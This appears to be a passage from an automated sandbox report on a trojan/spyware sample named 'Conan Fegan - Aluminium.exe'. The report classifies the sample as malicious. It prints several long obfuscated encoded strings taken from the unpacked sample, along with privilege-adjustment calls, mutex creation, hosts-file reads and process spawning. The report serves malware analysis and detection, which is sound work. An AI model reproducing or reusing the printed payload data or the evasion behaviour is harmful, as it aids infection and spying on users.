NNU4SNNNRPvfNOvbGZNRNPjNNNNLNNORNstLNNNDXXjNTXvVNNbNTNNNRXyMmQNNNOvtxNNNXqNLNNNXNOjNNOPbrNvtyNNNXXtNNRmNONNfNNNNUNNNENU4UNNNRPvfNOvbNRmNONNfNNNNUNNNENPtANNNTPvfNOvc+pwfNNUPNPNNNOUV7NNOjtNxNNNElBjNNpVNXNNNRXxbNNvtzNNNXNNZROFtENNNTNPbNNOZjONO0NNNNPNNNRDOmWjNNPtbTVYvPNDNtXWbONT8bNNNXXPxNNNbNNvtINNNTOPtHNNNTPjpbRjNNOtZbSDNNOvtFNNNTQNtbXtNNPt0WolfNNNbqzuZRRDEiYNNNPuhnRjHEOKV9NNOjTOvAStNNNFtgNNNXWuLbYtNNPtNdRmNSNWpNNNNWNNNENPtiNNNXN28jNNNXPjVPwzxK2cRspTRZNb5cS9LK2usJwF8NNNRANb5cS9bGOORRRjHJRjLeBtxEOtVEOcRVLDpEO5SugWjEOjAiZDNNPusn/tRGPORVRjxEPFjTSuZUNPfVNORUS9LGOjNEOusJRjLEOuRSZpNWNb5cTAbK1usnS9nAYjNNNFtlNNNXqNHNNOfXXjNTXtNGZNHNctNNNNbNNORNStfPomZNNNbGOkVUXQDNNNbZPNwLTgtAPEsnS9nAYjNNNEZRPOsnRjtJRjxeDjtK2uZXSuZYXl0PRDxEP281NNNXRjjFQPt2NNNXXQpNNNbJRDDUTvt4NNNXNNpn1tfEPksJRjfEPkRXZp0EPEsJRjxEPERVZopEOOLbBDNNPuZSRDHK2usJwF8NNNRGOuRRTuRTSuRTwzxbBNNNPtNEOtbeNNLdNNNGZNVNXNNNNNfNNORNN3WYNNOjXQbNNNbbBjNNPaZwNNNXPjpPomjNNNc0VtNNNDbeNNLdRmNRNRbNNNNZNNNENNWiZDNNPuuopm0NNNbYNz8kNNNXTAbZSt0eUjpPPEuiCtNNPu8DXQ8NNNbbDNNNPz9ONNNXWtxL1t0WPQUqO29PNNNXPvfNOvbNNOZjNDNUNNNNQDNNRDNHPvfNOvcTNNVJztVKztVLzvtENNNTNPbNNNNGZNZNVNNNNN4NNORNsttNNNE+PDNNOU4XNNNRXORNNNLNpwfNNUNXXjNTXuZjNtNFNNNNQjNNRDNPNluQNNNXXRDNNNbXXjNTXtNNRmNONNjNNNNDNNNENNVbEDNNPtbeNNLdRmNONONNNNNENNNENANWNNNPXPRNNNbXXjNTXuZjNDNZNNNNQtNNRDNPXRLNNNbXXjNTXuZjNtNqNNNNRtNNRDNPwNLNNOfH/tRYOljVXNRNNPfXXjHNNtbeNNLdWtNQ/uHTNNNoXvLNNvtzNNNXNPbNNNNGZNVNADNNNOZNNORNNagVNNNXo0xNNNbYO4jWNNNoSC4OQNtfSPtPNNNePjW7FNNNPtqiFtNNPtNNNNpXXjNTXyVNNvtzNNNXNNWmFjNNPa1VNNNXXv4bTNNNObNZNNNRXu4PXPLNNNbdNNOPH0cPNDNONNNNNNNZNNNNqwVhZP41ZQplAjNNNNNSNTjNNNPbPDNNV34NNODXNNOjPDNNV1A0pzyhM3ZNNNNNuOZNNTDNNNNwIIZN6OZNNONNNNNwE1IWENNNNCtGNNQ0ONNNV0Wfo2VNNNNNNNNNNtNNNIpIbtxWQjNNNCbOZjNJNNNONNNNBDNNNNfNNNNZNNNNVjNNNORNNNOYNNNNCjNNNOZNNNNTNNNNPtNNNNjNNNNWNNNNNDNNNNDNNNNONNNNNjNNNNZNNNNPNNNNNNNZODRNNNNNNNLNdtBJOjLNSjFJOjLNztYZOt8NQttNNNLN2jXzODLNwDBzODLN/tBzODLNltBzODLN4jBzODL
                  Source: 0.2.Conan Fegan - Aluminium.exe.960000.0.unpack, frmlogin.csBase64 encoded string: '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
                  Source: 0.0.Conan Fegan - Aluminium.exe.960000.0.unpack, frmlogin.csBase64 encoded string: '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
                  Source: 5.2.Conan Fegan - Aluminium.exe.c20000.1.unpack, frmlogin.csBase64 encoded string: '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
                  Source: 5.0.Conan Fegan - Aluminium.exe.c20000.0.unpack, frmlogin.csBase64 encoded string: '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
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/3@88/2
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeCode function: 5_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeCode function: 5_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Conan Fegan - Aluminium.exe.logJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeMutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
                  Source: Conan Fegan - Aluminium.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.651436438.0000000002D01000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.651436438.0000000002D01000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
                  Source: unknownProcess created: C:\Users\user\Desktop\Conan Fegan - Aluminium.exe 'C:\Users\user\Desktop\Conan Fegan - Aluminium.exe'
                  Source: unknownProcess created: C:\Users\user\Desktop\Conan Fegan - Aluminium.exe C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
